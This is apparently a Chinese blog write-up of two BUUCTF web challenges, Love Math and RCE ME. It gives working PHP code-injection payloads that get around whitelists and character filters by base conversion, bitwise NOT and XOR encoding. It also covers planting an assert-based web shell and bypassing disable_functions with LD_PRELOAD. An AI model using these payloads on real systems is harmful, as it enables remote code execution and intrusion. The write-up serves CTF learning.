buu做题(12)

最新推荐文章于 2024-08-06 00:04:17 发布
最新推荐文章于 2024-08-06 00:04:17 发布
阅读量536 收藏 5
点赞数 3
文章标签: ctf web buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80472909/article/details/140880849
版权

[CISCN 2019 初赛]Love Math

 <?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

首先, 限制了传入的参数的长度 小于80
然后是有一个黑名单, [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]']
不允许出现这些字符
最后就是一个白名单, 必须要出现那些函数

php可以通过变量动态调用函数

$a='system';
echo $a(whoami);

在限定了字符数的情况下可以通过$_GET[] 逃过字符的限制
?c=$_GET[a]&a=
在这里就是 ?c=($_GET{pi})($_GET{abs})&pi=system&abs=cat /flag
所以还需要构造出_GET
hex2bin 可以将16进制转换成字符串
又需要构造出 hex2bin
36进制存在数字和小写字母
在线网站: https://tool.lu/hexconvert/
在这里插入图片描述

base_convert()函数能够在任意进制之间转换数字
base_convert(37907361743,10,36) --> 可以得到 hex2bin
然后就是要得到_GET的十六进制
在线网站: https://www.bejson.com/convert/ox2str/
在这里插入图片描述

hex2bin('5f474554') -->_GET
但是数字加上字母又会到那个白名单的检测中去, 无法通过, 需要是纯数字
dechex()函数将10进制数转换为16进制
dechex(1598506324) --> 5f474554

所以就是
_GET --> hex2bin(dechex(1598506324)) —> base_convert(37907361743,10,36)(dechex(1598506324))

payload:
/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag

在这里插入图片描述

[极客大挑战 2019]RCE ME

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

字母数字都被禁用了, 可以通过取反绕过
脚本运行即可

<?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';

直接运行即可
system没反应, 好吧, 不可能这么简单
尝试一下 phpinfo()
?code=(~%8F%97%8F%96%91%99%90)();
在这里插入图片描述过滤了很多的函数
在这里插入图片描述

使用assert 函数, 构造一句话木马
在这里插入图片描述
payload:
?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6);

可以成功执行, 然后连接蚁剑
在这里插入图片描述

连接蚁剑, 可以看到有flag, 但是点进去是空白的
在这里插入图片描述

利用工具: (也可以使用蚁剑里面的插件)
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

在/var/tmp目录 有上传权限,可以上传bypass_disablefun_x64.so和bypass_disablefunc.php
在这里插入图片描述

https://www.cnblogs.com/yunqian2017/p/13308599.html
最后的payload是
(直接拿的别人的payload,使用的异或)
?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=include(%27/var/tmp/shell.php%27)&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/bypass_disablefunc_x64.so

在这里插入图片描述

pwfortune
关注
buu做题(8)
pwfortune的博客
07-27 928
然后继续查看源码, 可以发现有一行base64的编码, 将其解密, 可以发现就是index.php的代码。, 很多都用不了了, 代码里可以看到 flag 在 config里面 , 不需要去构造一些命令执行啥的。参数过滤了很多命令, 绕过过滤, 最后能够依靠 反引号 `` 执行命令。然后尝试将index.php 按照这样的方式编码, 看看能不能包含到。能够访问到 需要的append()方法, 构造相应的值进行文件包含。的, 理论上应该用不了, 可能哪里没做好, 导致放出来了,查看根目录, 可以发现flag。
buu做题(5)
pwfortune的博客
07-19 1059
current(localeconv())永远都是个点 " . " 配合 scandir(current(localeconv())) 读取当前的目录。在使用 session_id()的时候 需要使用session_start()来开启session会话。不晓得为啥总是读取不了 , file:///etc/passwd 也读不了, 也不晓得是啥原因。那么可以用这个函数来获取cookie中的。可以看到需要的flag.php文件 , 要想办法读到这个文件。(这一块的内容也还不是很了解, 后面还得继续学习一下)
buu做题(6)
pwfortune的博客
07-20 529
在index.php 也没有一个 文件包含漏洞, 可以目录遍历。什么都没有, 尝试用dirsearch扫一下目录。可以看到它的版本不是最新的, 搜一下相关的漏洞。扫一下目录 可以发现 robots.txt。网上挺多这样满足这样的表达式的数字 ,可以扫到一个 /phpmyadmin。抓个包 可以发现 /fl4g.php。使用 e 绕过 (本地测试一下就行)全是乱码的, 不过不影响做题。似乎有个header头跳转。可以直接进入到数据库里面。过滤了空格 和 cat。tac 代替 cat。$IFS$9代替空格。
buu做题(9)
pwfortune的博客
07-28 548
不过看后面, 应该会显示, 只需要把后面img 的值改一下相应的base64编码就是, 数字好像都没变。下载源码, 里面有几千个php文件, 有很多shell, 但很多都没用, 需要写脚本辨别。感觉构造的也没毛病啊, 怎么显示这个啊, 直接用网上的payload。函数从数组中将变量导入到当前的符号表, 存在变量覆盖的作用。经过 filter()过滤, 会存在一个反序列化的逃逸。会将匹配到的数组里面的内容替换为空 ,赋值不用的值进行不同的操作,可以指向相应的路径, 读取文件。存在一个反序列化的操作,
buu做题(14)
pwfortune的博客
08-06 413
dirsearch扫描, 字典里面明明有,扫描的时候就是没扫出来, 有点奇怪直接访问也访问不了, 不理解直接看一下源码吧需要满足password的md5值的前六位等于6d0bc1写个python脚本爆破一下登录之后可以看到生成的.shtml文件或者抓包访问文件用户名是可控的, 根据源码也可以知道, 会被写入到这个.shtml文件中搜索一下shtml文件ssi注入写入一些命令执行2020666访问相应的shtml文件。
buu做题(10)
pwfortune的博客
07-29 263
尝试购买, 操作失败, 根据题目, 跟Unicode有关, 只能输入一个字符搜索一个比千大的输入4 和 ፼直接得到flag (直接用万也可以)
buu做题(11)
pwfortune的博客
07-31 126
抓个包可以发现是 Smarty框架在页面可以观察到 一个 XFF头, 可以猜测注入点就在这通过if标签执行命令 ,读取flag。
buu做题(7)
pwfortune的博客
07-21 438
可以满足 $_GET['flag']==$x 而且 $x==handsome 也满足!登录后就会发现 cookie多出一行 user , 他的值经过url解码就会发现就是我们输入的东西。然后 exit($handsome) 输出 $handsome , 经过前面的GET的变量覆盖。看起来这是矛盾的, 但是可以传两个参数 , 一个是flag 一个是handsome。$handsome=$flag , 所以就可以输出flag的值了。当然也可以构造出其他的, 利用后面的。用工具githack下载源码。
buu做题(13)
pwfortune的博客
08-03 236
给了一个账户: cookie / monster根据提示, 我们需要以admin的身份登录抓个包 , 可以发现一个奇怪的地方,以这样的方式确定登录的用户, 尝试伪造一下就可以得到flag也可以直接在浏览器上面登录之后 , 修改一下cookie的值为admin ,刷新一下就可以直接出现flag。
buu做题笔记——[安洵杯 2019]easy_web
weixin_46330722的博客
11-30 1347
BUU[安洵杯 2019]easy_web [安洵杯 2019]easy_web 进入题目就是这样一个页面,先看下源码 这里有一个提示,这题应该跟md5有关,这时我注意到了URL http://60c3d800-d438-4c23-87c2-dbee32a9e363.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= 这个img参数后面应该是个编码后的文件名,然后源码里就会出现base64编码的文件内容 将img参数的值解码
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 667
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
buu做题笔记——[网鼎杯 2020 朱雀组]phpweb&[SWPU2019]Web1
weixin_46330722的博客
11-06 1509
BUU[网鼎杯 2020 朱雀组]phpweb [网鼎杯 2020 朱雀组]phpweb 页面看不出啥,抓个包看看。 从包中我们可以看到,传递了两个参数,func和p。func的值是date,再结合p的值,我猜测这里是用了call_user_func()来回调函数,即将func的值当作函数名,p的值当作参数。那么我们直接使用system函数查看当前目录下的文件 回显Hacker,应该是被waf拦了,用highlight_file()看一下源码 <?php $disable_fun = arr
buu 水题记录(二)
pwnyuan's blog
11-08 1404
buuctf 刷题记录(二)BeforeCrypto还原大师传感器CipherrotUnencode密码学的心声这是什么一张谍报RSARSA2RSA3rsa 2RSA5RSAROLLDangerous RSASameMod[AFCTF2018]Morse[NCTF2019]Keyboard[GXYCTF2019]CheckIn[HDCTF2019]basic_rsa[HDCTF2019]bbbbbbrsa Before Crypto 还原大师 TASC?O3RJMV?WDJKX?ZM E903???4D
关于我做buu题的一些复盘笔记和经验(看了好多的wp)
m0_67767650的博客
05-14 247
一ACTF 新生赛 文件包含 filter php:// — 访问各个输⼊/输出流(I/O streams) php://input 是个可以访问请求的原始数据的只读流。 php://filter 是⼀种设计⽤来允许过滤器程序在打开时成为流的封装协议。这对于单独具有完整功能的⽂件函数⾮常有⽤,否则就没有机会在 读取内容之前将过滤器应⽤于流之上。 该协议语法为:php://filter:/<action>=<name> php://filter 的参数列表 参数 功能 read 读取
沈阳建筑大学在河南2021-2024各专业最低录取分数及位次表.pdf
最新发布
09-16
全国各大学在河北2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
贵州茅台数据(1).xlsx
09-16
贵州茅台数据(1)
cwgl_jy1301.doc
09-16
cwgl_jy1301.doc
java-ssm+jsp游戏账号交易系统实现源码(项目源码-说明文档)
09-16
登录进入游戏账号交易系统可以查看系统用户管理,用户信息管理,海洋新闻管理,海鲜信息管理,购买信息管理,订退单信息管理和系统管理首页、个人中心、卖家管理、用户管理、游戏类别管理、手续费用管理、地下城与勇士管理、地下城账号购买、地下城账号换绑管理、地下城账号申诉管理、地下城私信聊天管理、地下城私信回复管理、英雄联盟管理、英雄联盟购买管理 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:ssm 前端技术:jsp 关键技术:jsp、spring、ssm、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值